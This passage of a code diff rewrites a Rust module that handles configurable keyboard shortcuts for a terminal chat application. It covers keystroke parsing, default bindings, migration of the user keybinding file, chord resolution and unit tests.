"nextMessage", KeyContext::MessageSelector), - ("k", "prevMessage", KeyContext::MessageSelector), - ("j", "nextMessage", KeyContext::MessageSelector), - ("enter", "select", KeyContext::MessageSelector), - ("escape", "cancel", KeyContext::MessageSelector), - - // ========== THEME & MODEL PICKERS ========== - ("up", "prev", KeyContext::ThemePicker), - ("down", "next", KeyContext::ThemePicker), - ("k", "prev", KeyContext::ThemePicker), - ("j", "next", KeyContext::ThemePicker), - ("pageup", "pageUp", KeyContext::ThemePicker), - ("pagedown", "pageDown", KeyContext::ThemePicker), - ("enter", "select", KeyContext::ThemePicker), - ("escape", "cancel", KeyContext::ThemePicker), - - // ========== TASK LIST ========== - ("up", "prevTask", KeyContext::Task), - ("down", "nextTask", KeyContext::Task), - ("enter", "selectTask", KeyContext::Task), - ("escape", "closeTask", KeyContext::Task), - ("x", "toggleDone", KeyContext::Task), - - // ========== DIFF DIALOG ========== - ("up", "prevDiff", KeyContext::DiffDialog), - ("down", "nextDiff", KeyContext::DiffDialog), - ("a", "acceptDiff", KeyContext::DiffDialog), - ("enter", "acceptDiff", KeyContext::DiffDialog), - ("r", "rejectDiff", KeyContext::DiffDialog), - ("escape", "rejectDiff", KeyContext::DiffDialog), - ("pageup", "pageUp", KeyContext::DiffDialog), - ("pagedown", "pageDown", KeyContext::DiffDialog), - - // ========== MODAL SELECT (Generic) ========== - ("up", "prev", KeyContext::Select), - ("down", "next", KeyContext::Select), - ("k", "prev", KeyContext::Select), - ("j", "next", KeyContext::Select), - ("pageup", "pageUp", KeyContext::Select), - ("pagedown", "pageDown", KeyContext::Select), - ("enter", "select", KeyContext::Select), - ("escape", "cancel", KeyContext::Select), - ("/", "search", KeyContext::Select), - - // ========== PLUGIN & ATTACHMENTS ========== - ("up", "prev", KeyContext::Plugin), - ("down", "next", KeyContext::Plugin), - ("enter", "select", KeyContext::Plugin), - ("escape", "cancel", KeyContext::Plugin), - ("space", "toggle", KeyContext::Attachments), - ("a", "addAttachment", KeyContext::Attachments), - ("r", "removeAttachment", KeyContext::Attachments), - ]; - - defaults - .iter() - .filter_map(|(chord_str, action, context)| { - parse_chord(chord_str).map(|chord| ParsedBinding { - chord, - action: Some(action.to_string()), - context: context.clone(), - }) - }) - .collect() -} - -/// Current schema version for keybindings -pub const KEYBINDINGS_SCHEMA_VERSION: u32 = 1; -/// User keybindings loaded from ~/.coven-code/keybindings.json -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct UserKeybindings { - #[serde(default = "default_schema_version")] - pub schema_version: u32, - pub bindings: Vec, -} - -fn default_schema_version() -> u32 { - KEYBINDINGS_SCHEMA_VERSION -} - -impl Default for UserKeybindings { - fn default() -> Self { - Self { - schema_version: KEYBINDINGS_SCHEMA_VERSION, - bindings: Vec::new(), - } - } -} -#[derive(Debug, Clone, Serialize, Deserialize)] -struct JsonKeybindingConfig { - #[serde(default)] - bindings: Vec, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -struct JsonKeybindingBlock { - context: String, - bindings: IndexMap>, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct UserBinding { - pub chord: String, // e.g. "ctrl+k ctrl+d" - pub action: Option, // None = unbound - pub context: Option, -} - -impl UserKeybindings { - pub fn from_json_str(content: &str) -> Self { - let mut kb = serde_json::from_str(content) - .or_else(|_| Self::from_block_config(content)) - .unwrap_or_default(); - - // Warn about and filter out non-rebindable keys - let original_len = kb.bindings.len(); - kb.bindings.retain(|binding| { - let normalized = binding.chord.to_lowercase(); - if NON_REBINDABLE.iter().any(|protected| normalized == *protected) { - warn!("Cannot rebind protected key '{}' in keybindings.json", binding.chord); - return false; - } - true - }); - - if kb.bindings.len() < original_len { - let filtered_count = original_len - kb.bindings.len(); - warn!( - "Filtered out {} protected keybinding(s). Protected keys: {}", - filtered_count, - NON_REBINDABLE.join(", ") - ); - } - - kb - } - - pub fn load(config_dir: &Path) -> Self { - let path = config_dir.join("keybindings.json"); - if let Ok(content) = std::fs::read_to_string(&path) { - let mut kb = Self::from_json_str(&content); - let old_version = kb.schema_version; - kb.smart_merge_with_defaults(); - - // Save back if schema was updated - if kb.schema_version > old_version { - if let Err(e) = kb.save(config_dir) { - warn!("Failed to save updated keybindings: {}", e); - } - } - - kb - } else { - Self::default() - } - } - - pub fn save(&self, config_dir: &Path) -> anyhow::Result<()> { - let path = config_dir.join("keybindings.json"); - let json = serde_json::to_string_pretty(self)?; - std::fs::write(path, json)?; - Ok(()) - } - - fn from_block_config(content: &str) -> Result { - let config: JsonKeybindingConfig = serde_json::from_str(content)?; - let bindings = config - .bindings - .into_iter() - .flat_map(|block| { - let context = block.context; - block.bindings.into_iter().map(move |(chord, action)| UserBinding { - chord, - action, - context: Some(context.clone()), - }) - }) - .collect(); - Ok(Self { - schema_version: 0, - bindings, - }) - } - - /// Smart merge: preserve user customizations while adding new defaults - pub fn smart_merge_with_defaults(&mut self) { - if self.schema_version >= KEYBINDINGS_SCHEMA_VERSION { - return; // Already up to date - } - - let old_version = self.schema_version; - self.schema_version = KEYBINDINGS_SCHEMA_VERSION; - - // Build a set of user-customized bindings (those that differ from old defaults) - // and bindings user explicitly unbound - let mut user_customizations: std::collections::HashMap> = - std::collections::HashMap::new(); - for binding in &self.bindings { - // Migration: remove old bindings that have changed in defaults - // This distinguishes between "user customized" and "old default that changed" - - // Old: ctrl+a -> openModelPicker (moved to ctrl+shift+a) - if binding.chord == "ctrl+a" && binding.action.as_deref() == Some("openModelPicker") { - continue; - } - - // Old: tab -> togglePreview in Chat context (changed to indent) - if binding.chord == "tab" - && binding.context.as_deref() == Some("Chat") - && binding.action.as_deref() == Some("togglePreview") - { - continue; - } - - user_customizations - .insert(binding.chord.clone(), binding.action.clone()); - } - - // Get current defaults and integrate customizations - let mut merged_bindings = Vec::new(); - for default in default_bindings() { - let chord_str = format_chord_string(&default.chord); - let context_str = format!("{:?}", default.context); - - if let Some(custom_action) = user_customizations.get(&chord_str) { - // User has customized this binding, use their version - merged_bindings.push(UserBinding { - chord: chord_str.clone(), - action: custom_action.clone(), - context: Some(context_str), - }); - user_customizations.remove(&chord_str); - } else { - // Use the default - merged_bindings.push(UserBinding { - chord: chord_str, - action: default.action.clone(), - context: Some(context_str), - }); - } - } - - // Add any remaining user customizations that aren't in current defaults - for (chord, action) in user_customizations { - merged_bindings.push(UserBinding { - chord, - action, - context: None, - }); - } - - self.bindings = merged_bindings; - warn!( - "Keybindings schema upgraded from v{} to v{}. User customizations preserved.", - old_version, KEYBINDINGS_SCHEMA_VERSION - ); - } -} - -/// Resolved keybindings (defaults merged with user overrides) -pub struct KeybindingResolver { - bindings: Vec, - pending_chord: Vec, -} - -impl KeybindingResolver { - pub fn new(user: &UserKeybindings) -> Self { - let mut bindings = default_bindings(); - - // Apply user overrides (user bindings win, last match wins) - for user_binding in &user.bindings { - if let Some(chord) = parse_chord(&user_binding.chord) { - let context = user_binding - .context - .as_deref() - .and_then(|c| serde_json::from_str(&format!("\"{}\"", c)).ok()) - .unwrap_or(KeyContext::Global); - - bindings.push(ParsedBinding { - chord, - action: user_binding.action.clone(), - context, - }); - } - } - - Self { - bindings, - pending_chord: Vec::new(), - } - } - - /// Process a keystroke, returns action if binding matches - pub fn process( - &mut self, - keystroke: ParsedKeystroke, - context: &KeyContext, - ) -> KeybindingResult { - self.pending_chord.push(keystroke); - - // Find matching bindings in current context + Global - let matches: Vec<&ParsedBinding> = self - .bindings - .iter() - .filter(|b| &b.context == context || b.context == KeyContext::Global) - .filter(|b| b.chord.starts_with(self.pending_chord.as_slice())) - .collect(); - - if matches.is_empty() { - self.pending_chord.clear(); - return KeybindingResult::NoMatch; - } - - let exact: Vec<&ParsedBinding> = matches - .iter() - .copied() - .filter(|b| b.chord.len() == self.pending_chord.len()) - .collect(); - - if !exact.is_empty() { - // Last match wins (user overrides) - let binding = exact.last().unwrap(); - self.pending_chord.clear(); - return match &binding.action { - Some(action) => KeybindingResult::Action(action.clone()), - None => KeybindingResult::Unbound, - }; - } - - // Chord in progress - KeybindingResult::Pending - } - - pub fn cancel_chord(&mut self) { - self.pending_chord.clear(); - } - - pub fn has_pending_chord(&self) -> bool { - !self.pending_chord.is_empty() - } -} - -impl PartialEq for ParsedKeystroke { - fn eq(&self, other: &Self) -> bool { - self.key == other.key - && self.ctrl == other.ctrl - && self.alt == other.alt - && self.shift == other.shift - && self.meta == other.meta - } -} - -#[derive(Debug, Clone)] -pub enum KeybindingResult { - Action(String), - Unbound, - Pending, - NoMatch, -} - -#[cfg(test)] -mod tests { - use super::*; - - #[test] - fn test_parse_keystroke_simple() { - let ks = parse_keystroke("enter").unwrap(); - assert_eq!(ks.key, "enter"); - assert!(!ks.ctrl); - assert!(!ks.alt); - assert!(!ks.shift); - assert!(!ks.meta); - } - - #[test] - fn test_parse_keystroke_ctrl_c() { - let ks = parse_keystroke("ctrl+c").unwrap(); - assert_eq!(ks.key, "c"); - assert!(ks.ctrl); - assert!(!ks.alt); - } - - #[test] - fn test_parse_keystroke_ctrl_shift_enter() { - let ks = parse_keystroke("ctrl+shift+enter").unwrap(); - assert_eq!(ks.key, "enter"); - assert!(ks.ctrl); - assert!(ks.shift); - assert!(!ks.alt); - } - - #[test] - fn test_parse_keystroke_normalizes_esc() { - let ks = parse_keystroke("esc").unwrap(); - assert_eq!(ks.key, "escape"); - } - - #[test] - fn test_parse_keystroke_normalizes_return() { - let ks = parse_keystroke("return").unwrap(); - assert_eq!(ks.key, "enter"); - } - - #[test] - fn test_parse_keystroke_empty_returns_none() { - assert!(parse_keystroke("ctrl+").is_none()); - assert!(parse_keystroke("").is_none()); - } - - #[test] - fn test_parse_chord_single() { - let chord = parse_chord("ctrl+c").unwrap(); - assert_eq!(chord.len(), 1); - assert_eq!(chord[0].key, "c"); - assert!(chord[0].ctrl); - } - - #[test] - fn test_parse_chord_multi() { - let chord = parse_chord("ctrl+k ctrl+d").unwrap(); - assert_eq!(chord.len(), 2); - assert_eq!(chord[0].key, "k"); - assert_eq!(chord[1].key, "d"); - assert!(chord[0].ctrl); - assert!(chord[1].ctrl); - } - - #[test] - fn test_parse_chord_empty_returns_none() { - assert!(parse_chord("").is_none()); - } - - #[test] - fn test_default_bindings_not_empty() { - let bindings = default_bindings(); - assert!(!bindings.is_empty()); - } - - #[test] - fn test_default_bindings_contains_ctrl_c() { - let bindings = default_bindings(); - let ctrl_c = bindings.iter().find(|b| { - b.chord.len() == 1 - && b.chord[0].ctrl - && b.chord[0].key == "c" - && b.context == KeyContext::Global - }); - assert!(ctrl_c.is_some()); - assert_eq!(ctrl_c.unwrap().action.as_deref(), Some("interrupt")); - } - - #[test] - fn test_default_bindings_map_ctrl_shift_a_and_ctrl_k_to_app_shortcuts() { - let bindings = default_bindings(); - - let ctrl_shift_a = bindings.iter().find(|b| { - b.chord.len() == 1 - && b.chord[0].ctrl - && b.chord[0].shift - && b.chord[0].key == "a" - && b.context == KeyContext::Chat - }); - let ctrl_k = bindings.iter().find(|b| { - b.chord.len() == 1 - && b.chord[0].ctrl - && b.chord[0].key == "k" - && b.context == KeyContext::Chat - }); - - assert_eq!(ctrl_shift_a.and_then(|b| b.action.as_deref()), Some("openModelPicker")); - assert_eq!( - ctrl_k.and_then(|b| b.action.as_deref()), - Some("openCommandPalette") - ); - } - - #[test] - fn test_resolver_simple_action() { - let user = UserKeybindings::default(); - let mut resolver = KeybindingResolver::new(&user); - let ks = parse_keystroke("ctrl+c").unwrap(); - let result = resolver.process(ks, &KeyContext::Global); - assert!(matches!(result, KeybindingResult::Action(ref a) if a == "interrupt")); - } - - #[test] - fn test_resolver_no_match() { - let user = UserKeybindings::default(); - let mut resolver = KeybindingResolver::new(&user); - // ctrl+z has no default binding - let ks = parse_keystroke("ctrl+z").unwrap(); - let result = resolver.process(ks, &KeyContext::Chat); - assert!(matches!(result, KeybindingResult::NoMatch)); - } - - #[test] - fn test_resolver_context_match_global_from_chat() { - let user = UserKeybindings::default(); - let mut resolver = KeybindingResolver::new(&user); - // ctrl+l in Chat context maps to "clearLine" (newly added Phase 1 keybinding) - // Global context is checked after context-specific bindings - let ks = parse_keystroke("ctrl+l").unwrap(); - let result = resolver.process(ks, &KeyContext::Chat); - assert!(matches!(result, KeybindingResult::Action(ref a) if a == "clearLine")); - } - - #[test] - fn test_keystroke_equality() { - let ks1 = parse_keystroke("ctrl+enter").unwrap(); - let ks2 = parse_keystroke("ctrl+enter").unwrap(); - let ks3 = parse_keystroke("shift+enter").unwrap(); - assert_eq!(ks1, ks2); - assert_ne!(ks1, ks3); - } - - #[test] - fn test_user_keybindings_default_empty() { - let user = UserKeybindings::default(); - assert!(user.bindings.is_empty()); - } - - #[test] - fn test_user_keybindings_supports_ts_block_format() { - let user = UserKeybindings::from_json_str( - r#"{ - "bindings": [ - { - "context": "Chat", - "bindings": { - "ctrl+g": "chat:externalEditor", - "space": null - } - } - ] -}"#, - ); - - assert_eq!(user.bindings.len(), 2); - assert_eq!(user.bindings[0].context.as_deref(), Some("Chat")); - assert_eq!(user.bindings[0].chord, "ctrl+g"); - assert_eq!(user.bindings[0].action.as_deref(), Some("chat:externalEditor")); - assert_eq!(user.bindings[1].chord, "space"); - assert_eq!(user.bindings[1].action, None); - } - - #[test] - fn test_ctrl_j_maps_to_newline() { - let bindings = default_bindings(); - let ctrl_j = bindings.iter().find(|b| { - b.chord.len() == 1 - && b.chord[0].ctrl - && b.chord[0].key == "j" - && b.context == KeyContext::Chat - }); - assert!(ctrl_j.is_some(), "ctrl+j binding not found"); - assert_eq!(ctrl_j.unwrap().action.as_deref(), Some("newline")); - } - - #[test] - fn test_new_phase1_keybindings_registered() { - // Verify that all Phase 1 keybindings are registered - let bindings = default_bindings(); - - // Build list of keybinding actions - let actions: Vec = bindings - .iter() - .filter_map(|b| b.action.clone()) - .collect(); - - // Check Phase 1 keybinding actions exist - assert!(actions.contains(&"clearLine".to_string()), "clearLine action not found"); - assert!(actions.contains(&"submit".to_string()), "submit action not found"); - assert!(actions.contains(&"jumpToNextError".to_string()), "jumpToNextError action not found"); - assert!(actions.contains(&"jumpToPreviousError".to_string()), "jumpToPreviousError action not found"); - assert!(actions.contains(&"previousMessage".to_string()), "previousMessage action not found"); - assert!(actions.contains(&"nextMessage".to_string()), "nextMessage action not found"); - assert!(actions.contains(&"openHelp".to_string()), "openHelp action not found"); - assert!(actions.contains(&"deleteCharBefore".to_string()), "deleteCharBefore action not found"); - assert!(actions.contains(&"reverseIndent".to_string()), "reverseIndent action not found"); - - // Verify we have at least 10 new keybindings (Phase 1 requirement) - assert!( - actions.len() >= 40, - "Expected at least 40 keybindings, found {}", - actions.len() - ); - } - - #[test] - fn test_old_format_keybindings_get_upgraded() { - let old_format_json = r#"{ - "bindings": [ - { - "context": "Chat", - "bindings": { - "ctrl+shift+a": "openModelPicker", - "ctrl+e": "goLineEnd" - } - } - ] - }"#; - - let mut kb = UserKeybindings::from_json_str(old_format_json); - assert_eq!(kb.schema_version, 0, "Old format should start at version 0"); - - kb.smart_merge_with_defaults(); - - assert_eq!(kb.schema_version, 1, "Should be upgraded to version 1"); - assert!( - kb.bindings.iter().any(|b| b.chord == "meta+left"), - "meta+left (cmd+left) should be added from defaults after merge" - ); - assert!( - kb.bindings.iter().any(|b| b.chord == "ctrl+shift+a" && b.action.as_deref() == Some("openModelPicker")), - "User customization (ctrl+shift+a -> openModelPicker) should be preserved" - ); - } - - #[test] - fn test_cmd_left_resolves_to_go_line_start() { - let user = UserKeybindings::default(); - let mut resolver = KeybindingResolver::new(&user); - - // Create a keystroke for CMD+Left (SUPER modifier + left arrow) - let keystroke = ParsedKeystroke { - key: "left".to_string(), - ctrl: false, - alt: false, - shift: false, - meta: true, - }; - - let result = resolver.process(keystroke, &KeyContext::Chat); - match result { - KeybindingResult::Action(action) => { - assert_eq!(action, "goLineStart", "CMD+Left should map to goLineStart"); - } - other => panic!("Expected Action(\"goLineStart\"), got {:?}", other), - } - } -} +//! Configurable keyboard shortcuts system + +use indexmap::IndexMap; +use serde::{Deserialize, Serialize}; +use std::path::Path; +use tracing::warn; + +/// All keybinding contexts +#[derive(Debug, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)] +#[serde(rename_all = "PascalCase")] +pub enum KeyContext { + Global, + Chat, + Autocomplete, + Confirmation, + Help, + Transcript, + HistorySearch, + Task, + ThemePicker, + Settings, + Tabs, + Attachments, + Footer, + MessageSelector, + DiffDialog, + ModelPicker, + Select, + Plugin, +} + +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct ParsedKeystroke { + pub key: String, // normalized key name + pub ctrl: bool, + pub alt: bool, + pub shift: bool, + pub meta: bool, +} + +pub type Chord = Vec; + +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct ParsedBinding { + pub chord: Chord, + pub action: Option, // None = unbound + pub context: KeyContext, +} + +/// Parse a keystroke string like "ctrl+shift+enter" into ParsedKeystroke +pub fn parse_keystroke(s: &str) -> Option { + let s = s.trim().to_lowercase(); + let mut ctrl = false; + let mut alt = false; + let mut shift = false; + let mut meta = false; + let mut key_parts: Vec<&str> = Vec::new(); + + for part in s.split('+') { + let part = part.trim(); + if part.is_empty() { + continue; + } + match part { + "ctrl" | "control" => ctrl = true, + "alt" | "opt" | "option" => alt = true, + "shift" => shift = true, + "meta" | "cmd" | "command" | "super" | "win" => meta = true, + _ => key_parts.push(part), + } + } + + if key_parts.is_empty() { + return None; + } + + let key = normalize_key(key_parts.join("+").as_str()); + Some(ParsedKeystroke { + key, + ctrl, + alt, + shift, + meta, + }) +} + +fn format_chord_string(chord: &Chord) -> String { + chord + .iter() + .map(|ks| { + let mut parts = Vec::new(); + if ks.ctrl { + parts.push("ctrl"); + } + if ks.alt { + parts.push("alt"); + } + if ks.shift { + parts.push("shift"); + } + if ks.meta { + parts.push("meta"); + } + parts.push(&ks.key); + parts.join("+") + }) + .collect::>() + .join(" ") +} +fn normalize_key(k: &str) -> String { + match k { + "esc" | "escape" => "escape".to_string(), + "return" | "enter" => "enter".to_string(), + "del" | "delete" => "delete".to_string(), + "backspace" | "bs" => "backspace".to_string(), + "space" | " " => "space".to_string(), + "up" => "up".to_string(), + "down" => "down".to_string(), + "left" => "left".to_string(), + "right" => "right".to_string(), + "pageup" | "pgup" => "pageup".to_string(), + "pagedown" | "pgdn" | "pgdown" => "pagedown".to_string(), + "home" => "home".to_string(), + "end" => "end".to_string(), + "tab" => "tab".to_string(), + k => k.to_string(), + } +} + +/// Parse a chord (space-separated keystrokes like "ctrl+k ctrl+d") +pub fn parse_chord(s: &str) -> Option { + let keystrokes: Vec = + s.split_whitespace().filter_map(parse_keystroke).collect(); + if keystrokes.is_empty() { + None + } else { + Some(keystrokes) + } +} + +/// Keys that cannot be rebound +pub const NON_REBINDABLE: &[&str] = &["ctrl+c", "ctrl+d", "ctrl+m"]; + +/// Default keybindings with comprehensive coverage of text editing, navigation, vim, and TUI actions +/// +/// # Standard Keybindings (Phase 1 Implementation) +/// - **Ctrl+L**: Clear current input line (like bash) [Chat context only due to conflict] +/// - **Ctrl+Shift+A**: Open the model picker +/// - **Ctrl+K**: Open the command palette +/// - **Ctrl+U**: Kill input from cursor to start of line (Emacs-style) +/// - **Alt+←/Alt+→**: Navigate to previous/next message in transcript +/// - **Ctrl+. (Ctrl+>)**: Jump to next error/issue in messages +/// - **Ctrl+Shift+.**: Jump to previous error/issue +/// - **Shift+Tab**: Reverse indent/unindent in input (cycle permission mode) +/// - **Ctrl+H**: Delete character before cursor (Chat context, Emacs-style) +/// - **Alt+H**: Open help (alternative to F1) +/// - **Ctrl+O**: Jump back in history (command history) +/// - **Ctrl+I**: Jump forward in history +/// - **Alt+D**: Delete word forward (already implemented) +/// - **Ctrl+V**: Paste from clipboard (already implemented) +pub fn default_bindings() -> Vec { + let defaults: &[(&str, &str, KeyContext)] = &[ + // ========== GLOBAL CONTROL ========== + ("ctrl+c", "interrupt", KeyContext::Global), + // Ctrl+D is handled directly for the two-press exit confirmation flow. + ("ctrl+l", "redraw", KeyContext::Global), + ("ctrl+r", "historySearch", KeyContext::Global), + ("ctrl+b", "createBranch", KeyContext::Global), + ("alt+h", "openHelp", KeyContext::Global), + // ========== CHAT / INPUT CONTEXT ========== + // Message submission + ("enter", "submit", KeyContext::Chat), + // Newline insertion (Shift+Enter / Ctrl+J for multi-line composing) + ("shift+enter", "newline", KeyContext::Chat), + // Fallback for terminals that do not support the kitty keyboard protocol + // (e.g. Terminal.app, older iTerm2, Windows Terminal, or SSH sessions). + // Without the protocol, Shift+Enter is sent as a raw newline byte (0x0A, + // LF); crossterm reports that as KeyCode::Char('j') with CONTROL because + // Ctrl+J == 0x0A in ASCII. When the protocol is enabled (see + // PushKeyboardEnhancementFlags in tui/src/lib.rs), terminals like Ghostty + // send a proper CSI-u sequence with the Shift modifier instead, so this + // fallback is not needed there. Keep it as a compatibility belt-and-braces + // for terminals that do not support the protocol. + ("ctrl+j", "newline", KeyContext::Chat), + // Line start/end navigation + ("home", "goLineStart", KeyContext::Chat), + ("cmd+left", "goLineStart", KeyContext::Chat), + ("ctrl+a", "goLineStart", KeyContext::Chat), + ("end", "goLineEnd", KeyContext::Chat), + ("cmd+right", "goLineEnd", KeyContext::Chat), + ("ctrl+e", "goLineEnd", KeyContext::Chat), + // Word navigation + ("ctrl+left", "moveWordBackward", KeyContext::Chat), + ("ctrl+right", "moveWordForward", KeyContext::Chat), + // Word deletion + ("ctrl+w", "killWord", KeyContext::Chat), + ("alt+backspace", "killWord", KeyContext::Chat), + ("alt+d", "deleteWord", KeyContext::Chat), + // Character/line deletion + ("ctrl+h", "deleteCharBefore", KeyContext::Chat), + ("ctrl+u", "killToStart", KeyContext::Chat), + ("ctrl+l", "clearLine", KeyContext::Chat), + // History navigation + ("up", "historyPrev", KeyContext::Chat), + ("ctrl+o", "historyPrev", KeyContext::Chat), + ("down", "historyNext", KeyContext::Chat), + ("ctrl+i", "historyNext", KeyContext::Chat), + // Message navigation + ("alt+left", "previousMessage", KeyContext::Chat), + ("alt+right", "nextMessage", KeyContext::Chat), + // Error/issue navigation + ("ctrl+.", "jumpToNextError", KeyContext::Chat), + ("ctrl+shift+.", "jumpToPreviousError", KeyContext::Chat), + // Searching + ("ctrl+f", "findInMessage", KeyContext::Chat), + ("ctrl+shift+f", "globalSearch", KeyContext::Chat), + ("f3", "findNext", KeyContext::Chat), + ("ctrl+]", "findNext", KeyContext::Chat), + ("shift+f3", "findPrev", KeyContext::Chat), + ("ctrl+[", "findPrev", KeyContext::Chat), + ("ctrl+g", "goToLine", KeyContext::Chat), + // Indentation + ("tab", "indent", KeyContext::Chat), + ("shift+tab", "reverseIndent", KeyContext::Chat), + // Scrolling + ("pageup", "scrollUp", KeyContext::Chat), + ("pagedown", "scrollDown", KeyContext::Chat), + // App shortcuts + ("ctrl+shift+a", "openModelPicker", KeyContext::Chat), + ("ctrl+k", "openCommandPalette", KeyContext::Chat), + // ========== CONFIRMATION DIALOGS ========== + ("y", "yes", KeyContext::Confirmation), + ("enter", "yes", KeyContext::Confirmation), + ("n", "no", KeyContext::Confirmation), + ("escape", "no", KeyContext::Confirmation), + ("up", "prevOption", KeyContext::Confirmation), + ("down", "nextOption", KeyContext::Confirmation), + // ========== HELP OVERLAY ========== + ("escape", "close", KeyContext::Help), + ("q", "close", KeyContext::Help), + ("up", "scrollUp", KeyContext::Help), + ("down", "scrollDown", KeyContext::Help), + ("pageup", "pageUp", KeyContext::Help), + ("pagedown", "pageDown", KeyContext::Help), + // ========== HISTORY SEARCH ========== + ("up", "prevResult", KeyContext::HistorySearch), + ("down", "nextResult", KeyContext::HistorySearch), + ("enter", "select", KeyContext::HistorySearch), + ("escape", "cancel", KeyContext::HistorySearch), + ("tab", "togglePreview", KeyContext::HistorySearch), + // ========== TRANSCRIPT / MESSAGE SELECTION ========== + ("up", "prevMessage", KeyContext::Transcript), + ("down", "nextMessage", KeyContext::Transcript), + ("pageup", "pageUp", KeyContext::Transcript), + ("pagedown", "pageDown", KeyContext::Transcript), + ("home", "goStart", KeyContext::Transcript), + ("end", "goEnd", KeyContext::Transcript), + ("enter", "selectMessage", KeyContext::Transcript), + ("escape", "cancel", KeyContext::Transcript), + // ========== MESSAGE SELECTOR OVERLAY ========== + ("up", "prevMessage", KeyContext::MessageSelector), + ("down", "nextMessage", KeyContext::MessageSelector), + ("k", "prevMessage", KeyContext::MessageSelector), + ("j", "nextMessage", KeyContext::MessageSelector), + ("enter", "select", KeyContext::MessageSelector), + ("escape", "cancel", KeyContext::MessageSelector), + // ========== THEME & MODEL PICKERS ========== + ("up", "prev", KeyContext::ThemePicker), + ("down", "next", KeyContext::ThemePicker), + ("k", "prev", KeyContext::ThemePicker), + ("j", "next", KeyContext::ThemePicker), + ("pageup", "pageUp", KeyContext::ThemePicker), + ("pagedown", "pageDown", KeyContext::ThemePicker), + ("enter", "select", KeyContext::ThemePicker), + ("escape", "cancel", KeyContext::ThemePicker), + // ========== TASK LIST ========== + ("up", "prevTask", KeyContext::Task), + ("down", "nextTask", KeyContext::Task), + ("enter", "selectTask", KeyContext::Task), + ("escape", "closeTask", KeyContext::Task), + ("x", "toggleDone", KeyContext::Task), + // ========== DIFF DIALOG ========== + ("up", "prevDiff", KeyContext::DiffDialog), + ("down", "nextDiff", KeyContext::DiffDialog), + ("a", "acceptDiff", KeyContext::DiffDialog), + ("enter", "acceptDiff", KeyContext::DiffDialog), + ("r", "rejectDiff", KeyContext::DiffDialog), + ("escape", "rejectDiff", KeyContext::DiffDialog), + ("pageup", "pageUp", KeyContext::DiffDialog), + ("pagedown", "pageDown", KeyContext::DiffDialog), + // ========== MODAL SELECT (Generic) ========== + ("up", "prev", KeyContext::Select), + ("down", "next", KeyContext::Select), + ("k", "prev", KeyContext::Select), + ("j", "next", KeyContext::Select), + ("pageup", "pageUp", KeyContext::Select), + ("pagedown", "pageDown", KeyContext::Select), + ("enter", "select", KeyContext::Select), + ("escape", "cancel", KeyContext::Select), + ("/", "search", KeyContext::Select), + // ========== PLUGIN & ATTACHMENTS ========== + ("up", "prev", KeyContext::Plugin), + ("down", "next", KeyContext::Plugin), + ("enter", "select", KeyContext::Plugin), + ("escape", "cancel", KeyContext::Plugin), + ("space", "toggle", KeyContext::Attachments), + ("a", "addAttachment", KeyContext::Attachments), + ("r", "removeAttachment", KeyContext::Attachments), + ]; + + defaults + .iter() + .filter_map(|(chord_str, action, context)| { + parse_chord(chord_str).map(|chord| ParsedBinding { + chord, + action: Some(action.to_string()), + context: context.clone(), + }) + }) + .collect() +} + +/// Current schema version for keybindings +pub const KEYBINDINGS_SCHEMA_VERSION: u32 = 1; +/// User keybindings loaded from ~/.coven-code/keybindings.json +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct UserKeybindings { + #[serde(default = "default_schema_version")] + pub schema_version: u32, + pub bindings: Vec, +} + +fn default_schema_version() -> u32 { + KEYBINDINGS_SCHEMA_VERSION +} + +impl Default for UserKeybindings { + fn default() -> Self { + Self { + schema_version: KEYBINDINGS_SCHEMA_VERSION, + bindings: Vec::new(), + } + } +} +#[derive(Debug, Clone, Serialize, Deserialize)] +struct JsonKeybindingConfig { + #[serde(default)] + bindings: Vec, +} + +#[derive(Debug, Clone, Serialize, Deserialize)] +struct JsonKeybindingBlock { + context: String, + bindings: IndexMap>, +} + +#[derive(Debug, Clone, Serialize, Deserialize)] +pub struct UserBinding { + pub chord: String, // e.g. "ctrl+k ctrl+d" + pub action: Option, // None = unbound + pub context: Option, +} + +impl UserKeybindings { + pub fn from_json_str(content: &str) -> Self { + let mut kb = serde_json::from_str(content) + .or_else(|_| Self::from_block_config(content)) + .unwrap_or_default(); + + // Warn about and filter out non-rebindable keys + let original_len = kb.bindings.len(); + kb.bindings.retain(|binding| { + let normalized = binding.chord.to_lowercase(); + if NON_REBINDABLE + .iter() + .any(|protected| normalized == *protected) + { + warn!( + "Cannot rebind protected key '{}' in keybindings.json", + binding.chord + ); + return false; + } + true + }); + + if kb.bindings.len() < original_len { + let filtered_count = original_len - kb.bindings.len(); + warn!( + "Filtered out {} protected keybinding(s). Protected keys: {}", + filtered_count, + NON_REBINDABLE.join(", ") + ); + } + + kb + } + + pub fn load(config_dir: &Path) -> Self { + let path = config_dir.join("keybindings.json"); + if let Ok(content) = std::fs::read_to_string(&path) { + let mut kb = Self::from_json_str(&content); + let old_version = kb.schema_version; + kb.smart_merge_with_defaults(); + + // Save back if schema was updated + if kb.schema_version > old_version { + if let Err(e) = kb.save(config_dir) { + warn!("Failed to save updated keybindings: {}", e); + } + } + + kb + } else { + Self::default() + } + } + + pub fn save(&self, config_dir: &Path) -> anyhow::Result<()> { + let path = config_dir.join("keybindings.json"); + let json = serde_json::to_string_pretty(self)?; + std::fs::write(path, json)?; + Ok(()) + } + + fn from_block_config(content: &str) -> Result { + let config: JsonKeybindingConfig = serde_json::from_str(content)?; + let bindings = config + .bindings + .into_iter() + .flat_map(|block| { + let context = block.context; + block + .bindings + .into_iter() + .map(move |(chord, action)| UserBinding { + chord, + action, + context: Some(context.clone()), + }) + }) + .collect(); + Ok(Self { + schema_version: 0, + bindings, + }) + } + + /// Smart merge: preserve user customizations while adding new defaults + pub fn smart_merge_with_defaults(&mut self) { + if self.schema_version >= KEYBINDINGS_SCHEMA_VERSION { + return; // Already up to date + } + + let old_version = self.schema_version; + self.schema_version = KEYBINDINGS_SCHEMA_VERSION; + + // Build a set of user-customized bindings (those that differ from old defaults) + // and bindings user explicitly unbound + let mut user_customizations: std::collections::HashMap> = + std::collections::HashMap::new(); + for binding in &self.bindings { + // Migration: remove old bindings that have changed in defaults + // This distinguishes between "user customized" and "old default that changed" + + // Old: ctrl+a -> openModelPicker (moved to ctrl+shift+a) + if binding.chord 